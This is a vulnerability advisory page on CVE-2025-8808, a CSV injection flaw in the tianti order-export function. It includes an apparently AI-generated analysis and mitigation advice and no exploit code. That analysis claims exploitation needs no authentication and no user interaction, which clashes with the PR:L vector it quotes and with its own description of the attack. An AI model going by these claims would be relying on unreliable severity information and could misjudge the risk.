Skip to main content

CVE-2025-8808: CSV Injection in xujeff tianti 天梯

Medium
VulnerabilityCVE-2025-8808cvecve-2025-8808
Published: Sun Aug 10 2025 (08/10/2025, 12:02:06 UTC)
Source: CVE Database V5
Vendor/Project: xujeff
Product: tianti 天梯

Description

A vulnerability was found in xujeff tianti 天梯 up to 2.3. It has been rated as problematic. This issue affects the function exportOrder of the file /tianti-module-admin/user/ajax/save of the component com.jeff.tianti.controller. The manipulation leads to csv injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

AILast updated: 08/18/2025, 01:05:20 UTC

Technical Analysis

CVE-2025-8808 is a CSV Injection vulnerability identified in the xujeff tianti 天梯 software, specifically affecting versions up to 2.3. The vulnerability resides in the exportOrder function within the /tianti-module-admin/user/ajax/save file of the com.jeff.tianti.controller component. CSV Injection occurs when untrusted input is embedded into CSV files without proper sanitization, allowing malicious actors to inject spreadsheet formulas or commands. When such a crafted CSV file is opened by an end user in spreadsheet software (e.g., Microsoft Excel), the injected formulas can execute, potentially leading to data leakage, command execution, or other malicious activities. The vulnerability is remotely exploitable without requiring user interaction or authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:L/UI:N). The CVSS 4.0 base score is 5.3, categorizing it as a medium severity issue. The vendor was notified but did not respond, and no patches have been released. Although no known exploits are currently observed in the wild, the public disclosure increases the risk of exploitation. The vulnerability's impact is primarily on data integrity and confidentiality, as malicious formulas can exfiltrate data or manipulate spreadsheet content. Given the nature of CSV Injection, the threat is particularly relevant in environments where exported CSV files are shared or processed by multiple users, especially in administrative or financial contexts.

Potential Impact

For European organizations using xujeff tianti 天梯, this vulnerability poses a moderate risk. The ability to inject malicious formulas into CSV exports can lead to unauthorized data access or manipulation when files are opened in spreadsheet applications. This can compromise sensitive business data, financial records, or user information, potentially violating GDPR requirements on data protection and privacy. The remote exploitability without user interaction or authentication increases the risk in automated or bulk export scenarios. Organizations relying on tianti 天梯 for order management or administrative functions may face operational disruptions or reputational damage if CSV Injection is exploited. Additionally, the lack of vendor response and patches means organizations must proactively mitigate the risk. The medium severity score reflects the moderate impact on confidentiality and integrity, with limited impact on availability. However, if attackers leverage this vulnerability as part of a broader attack chain, the consequences could escalate.

Mitigation Recommendations

1. Implement input sanitization and validation on all user-supplied data that is exported to CSV files, ensuring that any fields starting with characters like '=', '+', '-', or '@' are either escaped or prefixed with a single quote to neutralize formula execution. 2. Restrict access to the exportOrder function to authorized users only, applying strict access controls and monitoring usage logs for suspicious activity. 3. Educate users about the risks of opening CSV files from untrusted sources and encourage the use of spreadsheet software settings that disable automatic formula execution or enable protected view modes. 4. Employ network-level controls to limit exposure of the vulnerable endpoint, such as IP whitelisting or VPN access. 5. Monitor for any unusual CSV export patterns or anomalies that could indicate exploitation attempts. 6. Consider implementing application-layer firewalls or runtime application self-protection (RASP) solutions to detect and block injection attempts. 7. If feasible, review and modify the source code to sanitize output or switch to safer export formats that do not support formula execution. 8. Maintain an incident response plan to quickly address any detected exploitation or data compromise related to this vulnerability.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
VulDB
Date Reserved
2025-08-09T07:51:06.464Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 68988de7ad5a09ad00183e2f

Added to database: 8/10/2025, 12:17:43 PM

Last enriched: 8/18/2025, 1:05:20 AM

Last updated: 8/19/2025, 12:34:30 AM

Views: 14

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats